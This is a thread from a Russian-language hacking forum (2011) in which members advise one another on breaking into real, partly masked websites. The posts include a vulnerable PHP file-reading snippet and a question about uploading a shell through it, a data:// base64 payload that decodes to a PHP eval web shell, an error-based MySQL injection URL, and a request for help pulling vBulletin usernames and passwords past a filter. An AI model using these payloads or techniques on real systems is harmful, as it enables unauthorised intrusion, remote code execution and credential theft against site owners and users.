Старый 14.06.2011, 13:10   #1061
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Цитата:
Сообщение от G0han Посмотреть сообщение
Приветствую!

Нашлась LFI на одном ресурсе...
PHP код:
$fileb "dbase/mll/m.".$m;

$fp fopen($fileb"r");

$readfile file($fileb);

$data explode ("|||"$readfile[0]); 
Вопрос - как правильно эксплуатировать эту дыру, чтобы залить шелл?
Это не LFI, это читалка файлов.
Twost вне форума   Ответить с цитированием
Старый 14.06.2011, 13:35   #1062
G0han
 
Регистрация: 14.06.2011
Сообщений: 7
Репутация: 0
По умолчанию

Окей, читалка так читалка. Насколько я понимаю "читалка" не умеет пхп код исполнять, зато доблестно покажет содержимое какого-нибудь файлика
И все таки, реально ли кроме первой строки как нибудь прочитать файлы?
G0han вне форума   Ответить с цитированием
Старый 14.06.2011, 18:53   #1063
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Окей, читалка так читалка. Насколько я понимаю "читалка" не умеет пхп код исполнять, зато доблестно покажет содержимое какого-нибудь файлика
И все таки, реально ли кроме первой строки как нибудь прочитать файлы?
нет, тем более ты не показал остальной код. Пока - нет

Цитата:
http://www.***.ru/page.php?path=0.3.11char(39))+order+by+1,2,3,4,5,6 ,7,8,9,10
что тут имелось в виду под char(39) ? Там magic_quotes=on, кавычку так просто не закрыть *слепой инъекции тоже там не увидел, кавычка как была открыта, так и есть открыта, не закрыть кавычку - нет и инжекта*

Цитата:
http://www.***.edu/tage/index.php?path=asdasd
вот так можно было бы:

Цитата:
http://www.***.edu/tage/index.php?path=data:;base64,PD9waHAgZXZhbCgkX1JFUV VFU1RbY21kXSk7ID8%2b&cmd=phpinfo();
но там "URL file-access is disabled in the server configuration"

Последний раз редактировалось Twost; 17.05.2013 в 11:40..
Pashkela вне форума   Ответить с цитированием
Старый 14.06.2011, 19:10   #1064
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 252
Репутация: 155
По умолчанию

Тут проблемы нет, ну разве что по базам не попрыгаешь, точка парсится (хотя я особо не заморачивался, может и есть варианты)
http://www.***.ru/page.php?path=(select*from(select+name_const(versi on(),1),name_const(version(),1))a)

Цитата:
вот так можно было бы:
Не проскочило-бы, там ";" не пускает
__________________
------------------

Последний раз редактировалось Twost; 17.05.2013 в 11:40..
Jokester вне форума   Ответить с цитированием
Старый 14.06.2011, 19:12   #1065
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Не проскочило-бы, там ";" не пускает


ага, невнимательно ^_^

PS: и про точку в скуле провафлил

Последний раз редактировалось Pashkela; 14.06.2011 в 19:17..
Pashkela вне форума   Ответить с цитированием
Старый 14.06.2011, 20:45   #1066
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Добрый вереч.

Как вывести поля username, password (vbulletin), если фильтр не пропускает эти слова(имена колонок): username, password а так же email...

unhex(hex('password')) - выводит слово password

Спасибо.
Cross вне форума   Ответить с цитированием
Старый 14.06.2011, 20:57   #1067
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 252
Репутация: 155
По умолчанию

Cross - никак.

Что за манера задавать вопросы на которые есть только один ответ. Наверное если фильтр не пропускает то это и есть ответ, нет?

А если вы предполагаете что в фильтре есть какие-то косяки, и его можно обойти, то наверное нужно знать что именно и как фильтруется и иметь либо код, либо хотя-бы линк, нет?

Гаданий не будет, нет линка или кода - разбирайтесь сами, толку от флуда на 10 страниц никакого.

Пожалуйста )

кстати, вот из этого
Цитата:
unhex(hex('password')) - выводит слово password
можно сделать однозначный вывод - что никакого фильтра, по крайней мере на password, нету. И поэтому без линка по вашим исходным гадать вообще смысла не имеет, так как исходные не верны
__________________
------------------

Последний раз редактировалось Jokester; 14.06.2011 в 21:01..
Jokester вне форума   Ответить с цитированием
Старый 15.06.2011, 05:20   #1068
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

Cross, проверь есть ли вообще в таблице поля username и password.
M_script вне форума   Ответить с цитированием
Старый 15.06.2011, 08:09   #1069
G0han
 
Регистрация: 14.06.2011
Сообщений: 7
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
нет, тем более ты не показал остальной код. Пока - нет
что тут имелось в виду под char(39) ? Там magic_quotes=on, кавычку так просто не закрыть *слепой инъекции тоже там не увидел, кавычка как была открыта, так и есть открыта, не закрыть кавычку - нет и инжекта*
вот так можно было бы:
но там "URL file-access is disabled in the server configuration"
Цитата:
Сообщение от Jokester Посмотреть сообщение
Тут проблемы нет, ну разве что по базам не попрыгаешь, точка парсится (хотя я особо не заморачивался, может и есть варианты)
http://www.***.ru/page.php?path=(select*from(select+name_const(versi on(),1),name_const(version(),1))a)
Не проскочило-бы, там ";" не пускает
Ага, спасибо
По первому пункту:
Вот такой код
Код:
$m = "\";;"
$fb = "dbase/mll/m.".$m;
$fp = fopen($fb, "r");
$readfile = file($fb);
$data = explode ("|||", $readfile[0]);
$tema2 = trim($data[0]);
$autor = trim($data[1]);
$email = trim($data[2]);
$msg1 = trim($data[3]);
$date1 = trim($data[4]);
if($email !== "") {
print "<center><font size=6><a name=up>$tema2</a></font></center><a href=mailto:$email>$autor</a><br>$date1<br><p>$msg1</p><table width=100% cellspacing=0 cellpadding=0></table>";
} else {
print "<center><font size=6><a name=up>$tema2</a></font></center>$autor<br>$date1<br><p>$msg1</p><table width=100% cellspacing=0 cellpadding=0></table>";
}
echo "<p align=right><a href=?page=stat&read=yes&comm_m=add&m=$m>Add comment</a></p>";
по второму пункту - фильтры не обойти получается никак?

по третьему - не очень догоняю как там запрос составлен в оригинале, со скобочками с этими. Это документацию мускуля листать надо, чтобы понять что происходит? Или куда податься, чего почитать?

Последний раз редактировалось Twost; 17.05.2013 в 11:41..
G0han вне форума   Ответить с цитированием
Старый 15.06.2011, 09:06   #1070
Twost
 
Аватар для Twost
 
Регистрация: 03.07.2010
Сообщений: 172
Репутация: 110
По умолчанию

Цитата:
Сообщение от Cross Посмотреть сообщение
unhex(hex('password')) - выводит слово password
эм... а что он должен вывести то? 0_о

'password' - это строка, а не column_name.
Попробуй все таки без кавычек.
Twost вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot